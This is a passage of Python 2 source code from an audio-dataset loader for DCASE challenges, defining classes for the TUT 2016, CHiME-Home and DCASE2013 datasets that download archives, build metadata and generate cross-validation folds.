self.microphone_model = 'Soundman OKM II Klassik/studio A3 electret microphone'
self.evaluation_folds = 4
self.package_list = [
{
'remote_package': None,
'local_package': None,
'local_audio_path': os.path.join(self.local_path, 'audio'),
},
{
'remote_package': 'https://zenodo.org/record/45739/files/TUT-acoustic-scenes-2016-development.doc.zip',
'local_package': os.path.join(self.local_path, 'TUT-acoustic-scenes-2016-development.doc.zip'),
'local_audio_path': os.path.join(self.local_path, 'audio'),
},
{
'remote_package': 'https://zenodo.org/record/45739/files/TUT-acoustic-scenes-2016-development.meta.zip',
'local_package': os.path.join(self.local_path, 'TUT-acoustic-scenes-2016-development.meta.zip'),
'local_audio_path': os.path.join(self.local_path, 'audio'),
},
{
'remote_package': 'https://zenodo.org/record/45739/files/TUT-acoustic-scenes-2016-development.audio.1.zip',
'local_package': os.path.join(self.local_path, 'TUT-acoustic-scenes-2016-development.audio.1.zip'),
'local_audio_path': os.path.join(self.local_path, 'audio'),
},
{
'remote_package': 'https://zenodo.org/record/45739/files/TUT-acoustic-scenes-2016-development.audio.2.zip',
'local_package': os.path.join(self.local_path, 'TUT-acoustic-scenes-2016-development.audio.2.zip'),
'local_audio_path': os.path.join(self.local_path, 'audio'),
},
{
'remote_package': 'https://zenodo.org/record/45739/files/TUT-acoustic-scenes-2016-development.audio.3.zip',
'local_package': os.path.join(self.local_path, 'TUT-acoustic-scenes-2016-development.audio.3.zip'),
'local_audio_path': os.path.join(self.local_path, 'audio'),
},
{
'remote_package': 'https://zenodo.org/record/45739/files/TUT-acoustic-scenes-2016-development.audio.4.zip',
'local_package': os.path.join(self.local_path, 'TUT-acoustic-scenes-2016-development.audio.4.zip'),
'local_audio_path': os.path.join(self.local_path, 'audio'),
},
{
'remote_package': 'https://zenodo.org/record/45739/files/TUT-acoustic-scenes-2016-development.audio.5.zip',
'local_package': os.path.join(self.local_path, 'TUT-acoustic-scenes-2016-development.audio.5.zip'),
'local_audio_path': os.path.join(self.local_path, 'audio'),
},
{
'remote_package': 'https://zenodo.org/record/45739/files/TUT-acoustic-scenes-2016-development.audio.6.zip',
'local_package': os.path.join(self.local_path, 'TUT-acoustic-scenes-2016-development.audio.6.zip'),
'local_audio_path': os.path.join(self.local_path, 'audio'),
},
{
'remote_package': 'https://zenodo.org/record/45739/files/TUT-acoustic-scenes-2016-development.audio.7.zip',
'local_package': os.path.join(self.local_path, 'TUT-acoustic-scenes-2016-development.audio.7.zip'),
'local_audio_path': os.path.join(self.local_path, 'audio'),
},
{
'remote_package': 'https://zenodo.org/record/45739/files/TUT-acoustic-scenes-2016-development.audio.8.zip',
'local_package': os.path.join(self.local_path, 'TUT-acoustic-scenes-2016-development.audio.8.zip'),
'local_audio_path': os.path.join(self.local_path, 'audio'),
}
]
def on_after_extract(self):
"""After dataset packages are downloaded and extracted, meta-files are checked.
Parameters
----------
nothing
Returns
-------
nothing
"""
if not os.path.isfile(self.meta_file):
section_header('Generating meta file for dataset')
meta_data = {}
for fold in xrange(1, self.evaluation_folds):
# Read train files in
train_filename = os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_train.txt')
f = open(train_filename, 'rt')
reader = csv.reader(f, delimiter='\t')
for row in reader:
if row[0] not in meta_data:
meta_data[row[0]] = row[1]
f.close()
# Read evaluation files in
eval_filename = os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_evaluate.txt')
f = open(eval_filename, 'rt')
reader = csv.reader(f, delimiter='\t')
for row in reader:
if row[0] not in meta_data:
meta_data[row[0]] = row[1]
f.close()
f = open(self.meta_file, 'wt')
try:
writer = csv.writer(f, delimiter='\t')
for file in meta_data:
raw_path, raw_filename = os.path.split(file)
relative_path = self.absolute_to_relative(raw_path)
label = meta_data[file]
writer.writerow((os.path.join(relative_path, raw_filename), label))
finally:
f.close()
foot()
class TUTAcousticScenes_2016_EvaluationSet(Dataset):
"""TUT Acoustic scenes 2016 evaluation dataset
This dataset is used in DCASE2016 - Task 1, Acoustic scene classification
"""
def __init__(self, data_path='data'):
Dataset.__init__(self, data_path=data_path, name='TUT-acoustic-scenes-2016-evaluation')
self.authors = 'Annamaria Mesaros, Toni Heittola, and Tuomas Virtanen'
self.name_remote = 'TUT Acoustic Scenes 2016, evaluation dataset'
self.url = 'http://www.cs.tut.fi/sgn/arg/dcase2016/download/'
self.audio_source = 'Field recording'
self.audio_type = 'Natural'
self.recording_device_model = 'Roland Edirol R-09'
self.microphone_model = 'Soundman OKM II Klassik/studio A3 electret microphone'
self.evaluation_folds = 1
self.package_list = [
{
'remote_package': None,
'local_package': None,
'local_audio_path': os.path.join(self.local_path, 'audio'),
},
]
def on_after_extract(self):
"""After dataset packages are downloaded and extracted, meta-files are checked.
Parameters
----------
nothing
Returns
-------
nothing
"""
eval_filename = os.path.join(self.evaluation_setup_path, 'evaluate.txt')
if not os.path.isfile(self.meta_file) and os.path.isfile(eval_filename):
section_header('Generating meta file for dataset')
meta_data = {}
f = open(eval_filename, 'rt')
reader = csv.reader(f, delimiter='\t')
for row in reader:
if row[0] not in meta_data:
meta_data[row[0]] = row[1]
f.close()
f = open(self.meta_file, 'wt')
try:
writer = csv.writer(f, delimiter='\t')
for file in meta_data:
raw_path, raw_filename = os.path.split(file)
relative_path = self.absolute_to_relative(raw_path)
label = meta_data[file]
writer.writerow((os.path.join(relative_path, raw_filename), label))
finally:
f.close()
foot()
def train(self, fold=0):
raise IOError('Train setup not available.')
# TUT Sound events 2016 development and evaluation sets
class TUTSoundEvents_2016_DevelopmentSet(Dataset):
"""TUT Sound events 2016 development dataset
This dataset is used in DCASE2016 - Task 3, Sound event detection in real life audio
"""
def __init__(self, data_path='data'):
Dataset.__init__(self, data_path=data_path, name='TUT-sound-events-2016-development')
self.authors = 'Annamaria Mesaros, Toni Heittola, and Tuomas Virtanen'
self.name_remote = 'TUT Sound Events 2016, development dataset'
self.url = 'https://zenodo.org/record/45759'
self.audio_source = 'Field recording'
self.audio_type = 'Natural'
self.recording_device_model = 'Roland Edirol R-09'
self.microphone_model = 'Soundman OKM II Klassik/studio A3 electret microphone'
self.evaluation_folds = 4
self.package_list = [
{
'remote_package': None,
'local_package': None,
'local_audio_path': os.path.join(self.local_path, 'audio'),
},
{
'remote_package': None,
'local_package': None,
'local_audio_path': os.path.join(self.local_path, 'audio', 'residential_area'),
},
{
'remote_package': None,
'local_package': None,
'local_audio_path': os.path.join(self.local_path, 'audio', 'home'),
},
{
'remote_package': 'https://zenodo.org/record/45759/files/TUT-sound-events-2016-development.doc.zip',
'local_package': os.path.join(self.local_path, 'TUT-sound-events-2016-development.doc.zip'),
'local_audio_path': os.path.join(self.local_path, 'audio'),
},
{
'remote_package': 'https://zenodo.org/record/45759/files/TUT-sound-events-2016-development.meta.zip',
'local_package': os.path.join(self.local_path, 'TUT-sound-events-2016-development.meta.zip'),
'local_audio_path': os.path.join(self.local_path, 'audio'),
},
{
'remote_package': 'https://zenodo.org/record/45759/files/TUT-sound-events-2016-development.audio.zip',
'local_package': os.path.join(self.local_path, 'TUT-sound-events-2016-development.audio.zip'),
'local_audio_path': os.path.join(self.local_path, 'audio'),
},
]
def event_label_count(self, scene_label=None):
return len(self.event_labels(scene_label=scene_label))
def event_labels(self, scene_label=None):
labels = []
for item in self.meta:
if scene_label is None or item['scene_label'] == scene_label:
if 'event_label' in item and item['event_label'].rstrip() not in labels:
labels.append(item['event_label'].rstrip())
labels.sort()
return labels
def on_after_extract(self):
"""After dataset packages are downloaded and extracted, meta-files are checked.
Parameters
----------
nothing
Returns
-------
nothing
"""
if not os.path.isfile(self.meta_file):
meta_file_handle = open(self.meta_file, 'wt')
try:
writer = csv.writer(meta_file_handle, delimiter='\t')
for filename in self.audio_files:
raw_path, raw_filename = os.path.split(filename)
relative_path = self.absolute_to_relative(raw_path)
scene_label = relative_path.replace('audio', '')[1:]
base_filename, file_extension = os.path.splitext(raw_filename)
annotation_filename = os.path.join(self.local_path, relative_path.replace('audio', 'meta'), base_filename + '.ann')
if os.path.isfile(annotation_filename):
annotation_file_handle = open(annotation_filename, 'rt')
try:
annotation_file_reader = csv.reader(annotation_file_handle, delimiter='\t')
for annotation_file_row in annotation_file_reader:
writer.writerow((os.path.join(relative_path, raw_filename),
scene_label,
float(annotation_file_row[0].replace(',', '.')),
float(annotation_file_row[1].replace(',', '.')),
annotation_file_row[2], 'm'))
finally:
annotation_file_handle.close()
finally:
meta_file_handle.close()
def train(self, fold=0, scene_label=None):
if fold not in self.evaluation_data_train:
self.evaluation_data_train[fold] = {}
for scene_label_ in self.scene_labels:
if scene_label_ not in self.evaluation_data_train[fold]:
self.evaluation_data_train[fold][scene_label_] = []
if fold > 0:
with open(os.path.join(self.evaluation_setup_path, scene_label_+'_fold' + str(fold) + '_train.txt'), 'rt') as f:
for row in csv.reader(f, delimiter='\t'):
if len(row) == 5:
# Event meta
self.evaluation_data_train[fold][scene_label_].append({
'file': self.relative_to_absolute_path(row[0]),
'scene_label': row[1],
'event_onset': float(row[2]),
'event_offset': float(row[3]),
'event_label': row[4]
})
else:
data = []
for item in self.meta:
if item['scene_label'] == scene_label_:
if 'event_label' in item:
data.append({'file': self.relative_to_absolute_path(item['file']),
'scene_label': item['scene_label'],
'event_onset': item['event_onset'],
'event_offset': item['event_offset'],
'event_label': item['event_label'],
})
self.evaluation_data_train[0][scene_label_] = data
if scene_label:
return self.evaluation_data_train[fold][scene_label]
else:
data = []
for scene_label_ in self.scene_labels:
for item in self.evaluation_data_train[fold][scene_label_]:
data.append(item)
return data
def test(self, fold=0, scene_label=None):
if fold not in self.evaluation_data_test:
self.evaluation_data_test[fold] = {}
for scene_label_ in self.scene_labels:
if scene_label_ not in self.evaluation_data_test[fold]:
self.evaluation_data_test[fold][scene_label_] = []
if fold > 0:
with open(os.path.join(self.evaluation_setup_path, scene_label_+'_fold' + str(fold) + '_test.txt'), 'rt') as f:
for row in csv.reader(f, delimiter='\t'):
self.evaluation_data_test[fold][scene_label_].append({'file': self.relative_to_absolute_path(row[0])})
else:
data = []
files = []
for item in self.meta:
if scene_label_ in item:
if self.relative_to_absolute_path(item['file']) not in files:
data.append({'file': self.relative_to_absolute_path(item['file'])})
files.append(self.relative_to_absolute_path(item['file']))
self.evaluation_data_test[0][scene_label_] = data
if scene_label:
return self.evaluation_data_test[fold][scene_label]
else:
data = []
for scene_label_ in self.scene_labels:
for item in self.evaluation_data_test[fold][scene_label_]:
data.append(item)
return data
class TUTSoundEvents_2016_EvaluationSet(Dataset):
"""TUT Sound events 2016 evaluation dataset
This dataset is used in DCASE2016 - Task 3, Sound event detection in real life audio
"""
def __init__(self, data_path='data'):
Dataset.__init__(self, data_path=data_path, name='TUT-sound-events-2016-evaluation')
self.authors = 'Annamaria Mesaros, Toni Heittola, and Tuomas Virtanen'
self.name_remote = 'TUT Sound Events 2016, evaluation dataset'
self.url = 'http://www.cs.tut.fi/sgn/arg/dcase2016/download/'
self.audio_source = 'Field recording'
self.audio_type = 'Natural'
self.recording_device_model = 'Roland Edirol R-09'
self.microphone_model = 'Soundman OKM II Klassik/studio A3 electret microphone'
self.evaluation_folds = 1
self.package_list = [
{
'remote_package': None,
'local_package': None,
'local_audio_path': os.path.join(self.local_path, 'audio'),
},
{
'remote_package': None,
'local_package': None,
'local_audio_path': os.path.join(self.local_path, 'audio', 'home'),
},
{
'remote_package': None,
'local_package': None,
'local_audio_path': os.path.join(self.local_path, 'audio', 'residential_area'),
},
]
@property
def scene_labels(self):
labels = ['home', 'residential_area']
labels.sort()
return labels
def event_label_count(self, scene_label=None):
return len(self.event_labels(scene_label=scene_label))
def event_labels(self, scene_label=None):
labels = []
for item in self.meta:
if scene_label is None or item['scene_label'] == scene_label:
if 'event_label' in item and item['event_label'] not in labels:
labels.append(item['event_label'])
labels.sort()
return labels
def on_after_extract(self):
"""After dataset packages are downloaded and extracted, meta-files are checked.
Parameters
----------
nothing
Returns
-------
nothing
"""
if not os.path.isfile(self.meta_file) and os.path.isdir(os.path.join(self.local_path,'meta')):
meta_file_handle = open(self.meta_file, 'wt')
try:
writer = csv.writer(meta_file_handle, delimiter='\t')
for filename in self.audio_files:
raw_path, raw_filename = os.path.split(filename)
relative_path = self.absolute_to_relative(raw_path)
scene_label = relative_path.replace('audio', '')[1:]
base_filename, file_extension = os.path.splitext(raw_filename)
annotation_filename = os.path.join(self.local_path, relative_path.replace('audio', 'meta'), base_filename + '.ann')
if os.path.isfile(annotation_filename):
annotation_file_handle = open(annotation_filename, 'rt')
try:
annotation_file_reader = csv.reader(annotation_file_handle, delimiter='\t')
for annotation_file_row in annotation_file_reader:
writer.writerow((os.path.join(relative_path, raw_filename),
scene_label,
float(annotation_file_row[0].replace(',', '.')),
float(annotation_file_row[1].replace(',', '.')),
annotation_file_row[2], 'm'))
finally:
annotation_file_handle.close()
finally:
meta_file_handle.close()
def train(self, fold=0, scene_label=None):
raise IOError('Train setup not available.')
def test(self, fold=0, scene_label=None):
if fold not in self.evaluation_data_test:
self.evaluation_data_test[fold] = {}
for scene_label_ in self.scene_labels:
if scene_label_ not in self.evaluation_data_test[fold]:
self.evaluation_data_test[fold][scene_label_] = []
if fold > 0:
with open(os.path.join(self.evaluation_setup_path, scene_label + '_fold' + str(fold) + '_test.txt'), 'rt') as f:
for row in csv.reader(f, delimiter='\t'):
self.evaluation_data_test[fold][scene_label_].append({'file': self.relative_to_absolute_path(row[0])})
else:
data = []
files = []
for item in self.audio_files:
if scene_label_ in item:
if self.relative_to_absolute_path(item) not in files:
data.append({'file': self.relative_to_absolute_path(item)})
files.append(self.relative_to_absolute_path(item))
self.evaluation_data_test[0][scene_label_] = data
if scene_label:
return self.evaluation_data_test[fold][scene_label]
else:
data = []
for scene_label_ in self.scene_labels:
for item in self.evaluation_data_test[fold][scene_label_]:
data.append(item)
return data
# CHIME home
class CHiMEHome_DomesticAudioTag_DevelopmentSet(Dataset):
    def __init__(self, data_path='data'):
        Dataset.__init__(self, data_path=data_path, name='CHiMeHome-audiotag-development')
self.authors = 'Peter Foster, Siddharth Sigtia, Sacha Krstulovic, Jon Barker, and Mark Plumbley'
self.name_remote = 'The CHiME-Home dataset is a collection of annotated domestic environment audio recordings.'
self.url = ''
self.audio_source = 'Field recording'
self.audio_type = 'Natural'
self.recording_device_model = 'Unknown'
self.microphone_model = 'Unknown'
self.evaluation_folds = 10
self.package_list = [
{
'remote_package': 'https://archive.org/download/chime-home/chime_home.tar.gz',
'local_package': os.path.join(self.local_path, 'chime_home.tar.gz'),
'local_audio_path': os.path.join(self.local_path, 'chime_home', 'chunks'),
},
]
@property
def audio_files(self):
"""Get all audio files in the dataset, use only file from CHime-Home-refined set.
Parameters
----------
nothing
Returns
-------
files : list
audio files
"""
if self.files is None:
refined_files = []
with open(os.path.join(self.local_path, 'chime_home', 'chunks_refined.csv'), 'rt') as f:
for row in csv.reader(f, delimiter=','):
refined_files.append(row[1])
self.files = []
for file in self.package_list:
path = file['local_audio_path']
if path:
l = os.listdir(path)
p = path.replace(self.local_path + os.path.sep, '')
for f in l:
fileName, fileExtension = os.path.splitext(f)
if fileExtension[1:] in self.audio_extensions and fileName in refined_files:
self.files.append(os.path.abspath(os.path.join(path, f)))
self.files.sort()
return self.files
def read_chunk_meta(self, meta_filename):
if os.path.isfile(meta_filename):
meta_file_handle = open(meta_filename, 'rt')
try:
meta_file_reader = csv.reader(meta_file_handle, delimiter=',')
data = {}
for meta_file_row in meta_file_reader:
data[meta_file_row[0]] = meta_file_row[1]
finally:
meta_file_handle.close()
return data
def tagcode_to_taglabel(self, tag):
map = {'c': 'child speech',
'm': 'adult male speech',
'f': 'adult female speech',
'v': 'video game/tv',
'p': 'percussive sound',
'b': 'broadband noise',
'o': 'other',
'S': 'silence/background',
'U': 'unidentifiable'
}
if tag in map:
return map[tag]
else:
return None
def on_after_extract(self):
"""After dataset packages are downloaded and extracted, meta-files are checked.
Legacy dataset meta files are converted to be compatible with current scheme.
Parameters
----------
nothing
Returns
-------
nothing
"""
if not os.path.isfile(self.meta_file):
section_header('Generating meta file for dataset')
scene_label = 'home'
f = open(self.meta_file, 'wt')
try:
writer = csv.writer(f, delimiter='\t')
for file in self.audio_files:
raw_path, raw_filename = os.path.split(file)
relative_path = self.absolute_to_relative(raw_path)
base_filename, file_extension = os.path.splitext(raw_filename)
annotation_filename = os.path.join(raw_path, base_filename + '.csv')
meta_data = self.read_chunk_meta(annotation_filename)
tags = []
for i, tag in enumerate(meta_data['majorityvote']):
                        if tag == 'b':
                            print file
                        if tag != 'S' and tag != 'U':
tags.append(self.tagcode_to_taglabel(tag))
tags = ';'.join(tags)
writer.writerow(
(os.path.join(relative_path, raw_filename), scene_label, meta_data['majorityvote'], tags))
finally:
f.close()
foot()
all_folds_found = True
for fold in xrange(1, self.evaluation_folds):
for target_tag in self.audio_tags:
if not os.path.isfile(os.path.join(self.evaluation_setup_path,
'fold' + str(fold) + '_' + target_tag.replace('/', '-').replace(' ',
'_') + '_train.txt')):
all_folds_found = False
if not os.path.isfile(os.path.join(self.evaluation_setup_path,
'fold' + str(fold) + '_' + target_tag.replace('/', '-').replace(' ',
'_') + '_test.txt')):
all_folds_found = False
if not all_folds_found:
if not os.path.isdir(self.evaluation_setup_path):
os.makedirs(self.evaluation_setup_path)
numpy.random.seed(475686)
kf = KFold(n=len(self.audio_files), n_folds=self.evaluation_folds, shuffle=True)
refined_files = []
with open(os.path.join(self.local_path, 'chime_home', 'chunks_refined.csv'), 'rt') as f:
for row in csv.reader(f, delimiter=','):
refined_files.append(self.relative_to_absolute_path(os.path.join('chime_home','chunks',row[1]+'.wav')))
fold = 1
files = numpy.array(refined_files)
for train_index, test_index in kf:
train_files = files[train_index]
test_files = files[test_index]
with open(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_train.txt'), 'wt') as f:
writer = csv.writer(f, delimiter='\t')
for file in train_files:
raw_path, raw_filename = os.path.split(file)
relative_path = raw_path.replace(self.local_path + os.path.sep, '')
item = self.file_meta(file)[0]
writer.writerow([os.path.join(relative_path, raw_filename), item['scene_label'],item['tag_string'], ';'.join(item['tags'])])
with open(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_test.txt'), 'wt') as f:
writer = csv.writer(f, delimiter='\t')
for file in test_files:
raw_path, raw_filename = os.path.split(file)
relative_path = raw_path.replace(self.local_path + os.path.sep, '')
writer.writerow([os.path.join(relative_path, raw_filename)])
with open(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_evaluate.txt'), 'wt') as f:
writer = csv.writer(f, delimiter='\t')
for file in test_files:
raw_path, raw_filename = os.path.split(file)
relative_path = raw_path.replace(self.local_path + os.path.sep, '')
item = self.file_meta(file)[0]
writer.writerow([os.path.join(relative_path, raw_filename), item['scene_label'],item['tag_string'], ';'.join(item['tags'])])
                fold += 1
# Legacy datasets
# =====================================================
# DCASE 2013
# =====================================================
class DCASE2013_Scene_DevelopmentSet(Dataset):
"""DCASE 2013 Acoustic scene classification, development dataset
"""
def __init__(self, data_path='data'):
Dataset.__init__(self, data_path=data_path, name='DCASE2013-scene-development')
self.authors = 'Dimitrios Giannoulis, Emmanouil Benetos, Dan Stowell, and Mark Plumbley'
self.name_remote = 'IEEE AASP 2013 CASA Challenge - Public Dataset for Scene Classification Task'
self.url = 'http://www.elec.qmul.ac.uk/digitalmusic/sceneseventschallenge/'
self.audio_source = 'Field recording'
self.audio_type = 'Natural'
self.recording_device_model = 'Unknown'
self.microphone_model = 'Soundman OKM II Klassik/studio A3 electret microphone'
self.evaluation_folds = 5
self.package_list = [
{
'remote_package': 'http://c4dm.eecs.qmul.ac.uk/rdr/bitstream/handle/123456789/29/scenes_stereo.zip?sequence=1',
'local_package': os.path.join(self.local_path, 'scenes_stereo.zip'),
'local_audio_path': os.path.join(self.local_path, 'scenes_stereo'),
}
]
def on_after_extract(self):
# Make legacy dataset compatible with DCASE2016 dataset scheme
if not os.path.isfile(self.meta_file):
section_header('Generating meta file for dataset')
f = open(self.meta_file, 'wt')
try:
writer = csv.writer(f, delimiter='\t')
for file in self.audio_files:
raw_path, raw_filename = os.path.split(file)
relative_path = self.absolute_to_relative(raw_path)
label = os.path.splitext(os.path.split(file)[1])[0][:-2]
writer.writerow((os.path.join(relative_path, raw_filename), label))
finally:
f.close()
foot()
all_folds_found = True
for fold in xrange(1, self.evaluation_folds):
if not os.path.isfile(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_train.txt')):
all_folds_found = False
if not os.path.isfile(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_test.txt')):
all_folds_found = False
if not all_folds_found:
section_header('Generating evaluation setup files for dataset')
if not os.path.isdir(self.evaluation_setup_path):
os.makedirs(self.evaluation_setup_path)
print self.evaluation_setup_path
classes = []
files = []
for item in self.meta:
classes.append(item['scene_label'])
files.append(item['file'])
files = numpy.array(files)
sss = StratifiedShuffleSplit(y=classes, n_iter=self.evaluation_folds, test_size=0.3, random_state=0)
fold = 1
for train_index, test_index in sss:
# print("TRAIN:", train_index, "TEST:", test_index)
train_files = files[train_index]
with open(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_train.txt'), 'wt') as f:
writer = csv.writer(f, delimiter='\t')
for file in train_files:
raw_path, raw_filename = os.path.split(file)
label = self.file_meta(file)[0]['scene_label']
writer.writerow([os.path.join(raw_path, raw_filename), label])
test_files = files[test_index]
with open(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_test.txt'), 'wt') as f:
writer = csv.writer(f, delimiter='\t')
for file in test_files:
raw_path, raw_filename = os.path.split(file)
writer.writerow([os.path.join(raw_path, raw_filename)])
with open(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_evaluate.txt'), 'wt') as f:
writer = csv.writer(f, delimiter='\t')
for file in test_files:
raw_path, raw_filename = os.path.split(file)
label = self.file_meta(file)[0]['scene_label']
writer.writerow([os.path.join(raw_path, raw_filename), label])
fold += 1
foot()
class DCASE2013_Scene_EvaluationSet(DCASE2013_Scene_DevelopmentSet):
"""DCASE 2013 Acoustic scene classification, evaluation dataset
"""
def __init__(self, data_path='data'):
Dataset.__init__(self, data_path=data_path, name='DCASE2013-scene-challenge')
self.authors = 'Dimitrios Giannoulis, Emmanouil Benetos, Dan Stowell, and Mark Plumbley'
self.name_remote = 'IEEE AASP 2013 CASA Challenge - Private Dataset for Scene Classification Task'
self.url = 'http://www.elec.qmul.ac.uk/digitalmusic/sceneseventschallenge/'
self.audio_source = 'Field recording'
self.audio_type = 'Natural'
self.recording_device_model = 'Unknown'
self.microphone_model = 'Soundman OKM II Klassik/studio A3 electret microphone'
self.evaluation_folds = 5
self.package_list = [
{
'remote_package': 'https://archive.org/download/dcase2013_scene_classification_testset/scenes_stereo_testset.zip',
'local_package': os.path.join(self.local_path, 'scenes_stereo_testset.zip'),
'local_audio_path': os.path.join(self.local_path, 'scenes_stereo_testset'),
}
]
def on_after_extract(self):
# Make legacy dataset compatible with DCASE2016 dataset scheme
if not os.path.isfile(self.meta_file) or 1:
section_header('Generating meta file for dataset')
f = open(self.meta_file, 'wt')
try:
writer = csv.writer(f, delimiter='\t')
for file in self.audio_files:
raw_path, raw_filename = os.path.split(file)
relative_path = self.absolute_to_relative(raw_path)
label = os.path.splitext(os.path.split(file)[1])[0][:-2]
writer.writerow((os.path.join(relative_path, raw_filename), label))
finally:
f.close()
foot()
all_folds_found = True
for fold in xrange(1, self.evaluation_folds):
if not os.path.isfile(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_train.txt')):
all_folds_found = False
if not os.path.isfile(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_test.txt')):
all_folds_found = False
if not all_folds_found:
section_header('Generating evaluation setup files for dataset')
if not os.path.isdir(self.evaluation_setup_path):
os.makedirs(self.evaluation_setup_path)
classes = []
files = []
for item in self.meta:
classes.append(item['scene_label'])
files.append(item['file'])
files = numpy.array(files)
sss = StratifiedShuffleSplit(y=classes, n_iter=self.evaluation_folds, test_size=0.3, random_state=0)
fold = 1
for train_index, test_index in sss:
train_files = files[train_index]
with open(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_train.txt'), 'wt') as f:
writer = csv.writer(f, delimiter='\t')
for file in train_files:
raw_path, raw_filename = os.path.split(file)
label = self.file_meta(file)[0]['scene_label']
writer.writerow([os.path.join(raw_path, raw_filename), label])
test_files = files[test_index]
with open(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_test.txt'), 'wt') as f:
writer = csv.writer(f, delimiter='\t')
for file in test_files:
raw_path, raw_filename = os.path.split(file)
writer.writerow([os.path.join(raw_path, raw_filename)])
with open(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_evaluate.txt'), 'wt') as f:
writer = csv.writer(f, delimiter='\t')
for file in test_files:
raw_path, raw_filename = os.path.split(file)
label = self.file_meta(file)[0]['scene_label']
writer.writerow([os.path.join(raw_path, raw_filename), label])
fold += 1
foot()
# Sound events
class DCASE2013_Event_DevelopmentSet(Dataset):
"""DCASE 2013 Sound event detection, development dataset
"""
def __init__(self, data_path='data'):
Dataset.__init__(self, data_path=data_path, name='DCASE2013-event-development')
self.authors = 'Dimitrios Giannoulis, Emmanouil Benetos, Dan Stowell, and Mark Plumbley'
self.name_remote = 'IEEE AASP CASA Challenge - Public Dataset for Event Detection Task'
self.url = 'http://www.elec.qmul.ac.uk/digitalmusic/sceneseventschallenge/'
self.audio_source = 'Field recording'
self.audio_type = 'Natural'
self.recording_device_model = 'Unknown'
self.microphone_model = 'Soundman OKM II Klassik/studio A3 electret microphone'
self.evaluation_folds = 5
self.package_list = [
{
'remote_package': 'https://archive.org/download/dcase2013_event_detection_development_OS/events_OS_development_v2.zip',
'local_package': os.path.join(self.local_path, 'events_OS_development_v2.zip'),
'local_audio_path': os.path.join(self.local_path, 'events_OS_development_v2'),
},
# {
# 'remote_package':'http://c4dm.eecs.qmul.ac.uk/rdr/bitstream/handle/123456789/28/singlesounds_annotation.zip?sequence=9',
# 'local_package': os.path.join(self.local_path, 'singlesounds_annotation.zip'),
# 'local_audio_path': None,
# },
# {
# 'remote_package':'http://c4dm.eecs.qmul.ac.uk/rdr/bitstream/handle/123456789/28/singlesounds_stereo.zip?sequence=7',
# 'local_package': os.path.join(self.local_path, 'singlesounds_stereo.zip'),
# 'local_audio_path': os.path.join(self.local_path, 'singlesounds_stereo'),
# },
]
def on_after_extract(self):
# Make legacy dataset compatible with DCASE2016 dataset scheme
scene_label = 'office'
if not os.path.isfile(self.meta_file):
meta_file_handle = open(self.meta_file, 'wt')
try:
writer = csv.writer(meta_file_handle, delimiter='\t')
for file in self.audio_files:
raw_path, raw_filename = os.path.split(file)
relative_path = self.absolute_to_relative(raw_path)
base_filename, file_extension = os.path.splitext(raw_filename)
if file.find('singlesounds_stereo') != -1:
annotation_filename = os.path.join(self.local_path, 'Annotation1', base_filename + '_bdm.txt')
label = base_filename[:-2]
if os.path.isfile(annotation_filename):
annotation_file_handle = open(annotation_filename, 'rt')
try:
annotation_file_reader = csv.reader(annotation_file_handle, delimiter='\t')
for annotation_file_row in annotation_file_reader:
writer.writerow((os.path.join(relative_path, raw_filename), scene_label,
annotation_file_row[0], annotation_file_row[1], label, 'i'))
finally:
annotation_file_handle.close()
elif file.find('events_OS_development_v2') != -1:
annotation_filename = os.path.join(self.local_path, 'events_OS_development_v2',
base_filename + '_v2.txt')
if os.path.isfile(annotation_filename):
annotation_file_handle = open(annotation_filename, 'rt')
try:
annotation_file_reader = csv.reader(annotation_file_handle, delimiter='\t')
for annotation_file_row in annotation_file_reader:
writer.writerow((os.path.join(relative_path, raw_filename), scene_label,
annotation_file_row[0], annotation_file_row[1],
annotation_file_row[2], 'm'))
finally:
annotation_file_handle.close()
finally:
meta_file_handle.close()
all_folds_found = True
for fold in xrange(1, self.evaluation_folds):
if not os.path.isfile(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_train.txt')):
all_folds_found = False
if not os.path.isfile(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_test.txt')):
all_folds_found = False
if not all_folds_found:
# Construct training and testing sets. Isolated sounds are used for training and
# polyphonic mixtures are used for testing.
if not os.path.isdir(self.evaluation_setup_path):
os.makedirs(self.evaluation_setup_path)
files = []
for item in self.meta:
if item['file'] not in files:
files.append(item['file'])
files = numpy.array(files)
f = numpy.zeros(len(files))
sss = StratifiedShuffleSplit(y=f, n_iter=5, test_size=0.3, random_state=0)
fold = 1
for train_index, test_index in sss:
# print("TRAIN:", train_index, "TEST:", test_index)
train_files = files[train_index]
with open(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_train.txt'), 'wt') as f:
writer = csv.writer(f, delimiter='\t')
for file in train_files:
raw_path, raw_filename = os.path.split(file)
relative_path = raw_path.replace(self.local_path + os.path.sep, '')
for item in self.meta:
if item['file'] == file:
writer.writerow([os.path.join(relative_path, raw_filename), item['scene_label'],
item['event_onset'], item['event_offset'], item['event_label']])
test_files = files[test_index]
with open(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_test.txt'), 'wt') as f:
writer = csv.writer(f, delimiter='\t')
for file in test_files:
raw_path, raw_filename = os.path.split(file)
relative_path = raw_path.replace(self.local_path + os.path.sep, '')
writer.writerow([os.path.join(relative_path, raw_filename)])
with open(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_evaluate.txt'), 'wt') as f:
writer = csv.writer(f, delimiter='\t')
for file in test_files:
raw_path, raw_filename = os.path.split(file)
relative_path = raw_path.replace(self.local_path + os.path.sep, '')
for item in self.meta:
if item['file'] == file:
writer.writerow([os.path.join(relative_path, raw_filename), item['scene_label'],
item['event_onset'], item['event_offset'], item['event_label']])
fold += 1
class DCASE2013_Event_EvaluationSet(Dataset):
